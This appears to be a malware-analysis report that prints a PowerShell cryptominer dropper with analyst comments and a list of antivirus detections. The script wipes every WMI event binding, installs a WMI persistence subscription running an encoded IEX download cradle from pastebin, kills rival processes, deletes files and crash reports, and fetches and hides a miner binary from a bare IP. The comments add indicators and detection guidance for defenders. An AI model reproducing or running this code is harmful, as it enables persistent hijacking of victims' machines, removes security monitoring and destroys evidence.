No static analysis available.
# --- Phase 1: tear down existing WMI permanent event subscriptions ---
# Removes any filter / consumer already named 'ActiveMq' (a previous install of
# this same script) so the objects created below do not collide on the name.
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='ActiveMq'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='ActiveMq'" | Remove-WmiObject -Verbose
# "__Path LIKE '%subscription%'" matches every binding stored in root\Subscription,
# so this deletes ALL filter-to-consumer bindings on the host, not only its own.
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%subscription%'" | Remove-WmiObject -Verbose
# Second pass: drop every remaining binding whose filter name lacks 'ActiveMq'.
# NOTE(analysis): legitimate subscriptions (monitoring/EDR agents, management
# tooling, custom ops scripts) are collateral here. Their sudden disappearance
# is itself a detectable side effect; where Sysmon WMI events (19/20/21) or the
# Microsoft-Windows-WMI-Activity/Operational log are collected, look for the
# deletion burst immediately preceding the 'ActiveMq' creations below.
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'ActiveMq'} |Remove-WmiObject
# --- Phase 2: install a WMI permanent event subscription (MITRE ATT&CK T1546.003) ---
# Three objects in root\subscription: an __EventFilter (the trigger), a
# CommandLineEventConsumer (the command to run) and a __FilterToConsumerBinding
# that links them. They live in the WMI repository rather than as a file or a
# Run key, survive reboots, and are invisible to most file-based inventory.
$filterName = 'ActiveMq'
$consumerName = 'ActiveMq'
# Trigger: a WQL poll of Win32_PerfFormattedData_PerfOS_System with WITHIN 300,
# i.e. the consumer fires roughly every five minutes, indefinitely, without any
# user action. (The string literal spans two lines; nothing may go between them.)
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
# Consumer command line. 'shella' is not defined anywhere on this page;
# presumably a renamed or copied PowerShell host (the switches are PowerShell's)
# -- confirm against the dropped files. The -enc blob is UTF-16LE base64 and
# decodes to an IEX download cradle,
#   IEX (New-Object System.Net.Webclient).DownloadString('https://pastebin.com/raw/FYu4F1YR')
# (decode to verify). Both the encoded blob and the pastebin URL are hunt/block
# indicators. The closing '}' of this hashtable is absent from the listing,
# most likely dropped by the report's extraction.
$Arg =@{
Name=$consumerName
CommandLineTemplate="shella -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBGAFkAdQA0AEYAMQBZAFIAJwApAA=="
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
# Binding: activates the trigger -> command pair. Remediation is the inverse of
# this block: enumerate root\subscription for the three classes above and remove
# the 'ActiveMq' instances (the cmdlets at the top of this script show the shape;
# a cleanup must remove all three or the repository keeps orphaned objects).
# Detection: Sysmon events 19/20/21 and Microsoft-Windows-WMI-Activity/Operational
# event 5861 record permanent-subscription creation, including the consumer's
# CommandLineTemplate, so the encoded blob above is what the alert will contain.
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
# --- Phase 3: staging directory, payload locations, competitor cleanup ---
# Drop folder under ProgramData: writable by standard users and rarely inspected.
# Host IoC: C:\ProgramData\mssts\ and its contents.
cmd /c md C:\ProgramData\mssts
# Path of this script; not referenced anywhere in the visible listing.
$ne = $MyInvocation.MyCommand.Path
# Payload and config are fetched from a bare IP over plain HTTP on a non-standard
# port -- network IoCs (IP, port, URI path). 's.rar' is saved as 'javas.exe', a
# name chosen to pass as a Java component; whether the download is an archive
# or a PE is not established on this page.
$miner_url = "http://1.255.85.176:8080/Wuck/s.rar"
$miner_name = "javas"
$miner_cfg_url = "http://1.255.85.176:8080/Wuck/config.json"
$miner_cfg_name = "config.json"
$miner_path = "C:\ProgramData\mssts\javas.exe"
$miner_cfg_path = "C:\ProgramData\mssts\config.json"
# Kill-and-delete list. The process names and paths are not explained on the
# page; from context they appear to be artefacts of rival infections being
# cleared before this one runs (inferred, not established). Each name/path is
# a hunting artefact in its own right, and a chain of taskkill / del / wmic
# "process ... delete" from a PowerShell parent is a strong behavioural signal.
cmd /c taskkill /f /im dsm.exe
cmd /c taskkill /f /im dom.exe
cmd /c taskkill /f /im solr.exe
cmd /c del /f /q C:\Windows\System32\config\systemprofile\dom\*
# wmic kills every process whose image path sits under the given folder, so the
# script does not need to know the rival executable's name.
wmic process where "ExecutablePath like 'C:\\ProgramData\\Microsoft\\Windows\\Templates\\%'" delete
cmd /c del /f /q C:\ProgramData\Microsoft\Windows\Templates\*.exe
wmic process where "ExecutablePath like 'C:\\ProgramData\\Microsoft\\Windows\\WER\\%'" delete
# Note: WER\ is a legitimate Windows Error Reporting location; wiping it also
# destroys crash-report evidence that may be useful during incident response.
cmd /c del /f /q C:\ProgramData\Microsoft\Windows\WER\*
cmd /c taskkill /f /im JavaAccessBridge.exe
cmd /c del /f /q C:\Users\Public\Videos\*
#######################################
# Update: replace a file on disk with a fresh download.
# Arguments: $url       - source URL
#            $path      - destination file path
#            $proc_name - process name to stop before replacing the file
# Stops any running instance, deletes the old file, then downloads with
# System.Net.WebClient (plain HTTP per the URLs above; no integrity check).
# NOTE: the closing braces of Try/Catch, of this function, and of the if()
# further down are absent from the listing -- most likely stripped by the
# report's extraction. The block structure described here is inferred.
#######################################
function Update($url,$path,$proc_name)
{
# Stop whatever holds the file so Remove-Item and the overwrite succeed.
Get-Process -Name $proc_name | Stop-Process
Remove-Item $path
Try {
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($url,$path)
Catch {
# The typo 'donwload' is in the original and is a usable string indicator;
# do not "fix" it. "backurl" suggests a fallback URL, but none appears in the
# visible listing.
Write-Output "donwload with backurl"
# Two more process names, presumably further rival-miner cleanup (see Phase 3).
cmd /c taskkill /f /im kthreaddk.exe
cmd /c taskkill /f /im sysupdate.exe
# Re-download and relaunch only when the miner process is not already running,
# so repeated executions (e.g. via the five-minute WMI trigger, if the pastebin
# cradle re-fetches this script) do not restart it. Brace-less if-body: the
# two Update calls and the launch are assumed to be inside it.
if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))
Update $miner_url $miner_path $miner_name
Update $miner_cfg_url $miner_cfg_path $miner_cfg_name
# Hidden-window launch of C:\ProgramData\mssts\javas.exe. Detection angle:
# an unsigned binary under ProgramData started hidden by PowerShell, plus the
# sustained CPU load typical of a miner.
Start-Process $miner_path -windowstyle hidden
Write-Output "Miner Running"
# Kills every powershell.exe on the host -- presumably including the instance
# running this script unless it runs under the renamed 'shella' host from the
# consumer template (not established here). Also terminates any analyst or
# admin PowerShell session, which is itself a noticeable symptom.
cmd /c taskkill /f /im powershell.exe
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Malicious (score: 99)
CTX powershell.miner.pwsh
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Generic.PWSH.Miner.C.639B8AB5
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Scr.Malcode!gen
ESET-NOD32 PowerShell/CoinMiner.BW
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Generic.PWSH.Miner.C.639B8AB5
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Generic.PWSH.Miner.C.639B8AB5
Tencent Win32.Trojan.Generic.Ssmw
Sophos Clean
F-Secure Trojan.TR/PShell.Miner.G
DrWeb Clean
VIPRE Generic.PWSH.Miner.C.639B8AB5
TrendMicro Clean
CMC Clean
Emsisoft Generic.PWSH.Miner.C.639B8AB5 (B)
huorong TrojanDownloader/PS.NetLoader.gc
FireEye Generic.PWSH.Miner.C.639B8AB5
Jiangmin Clean
Varist Clean
Avira TR/PShell.Miner.G
Fortinet Clean
Antiy-AVL Clean
Kingsoft Script.Ks.Malware.1747
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.PWSH.Miner.C.639B8AB5
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Generic
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
GData Generic.PWSH.Miner.C.639B8AB5
AVG Clean
Panda Clean
alibabacloud Clean
No IRMA results available.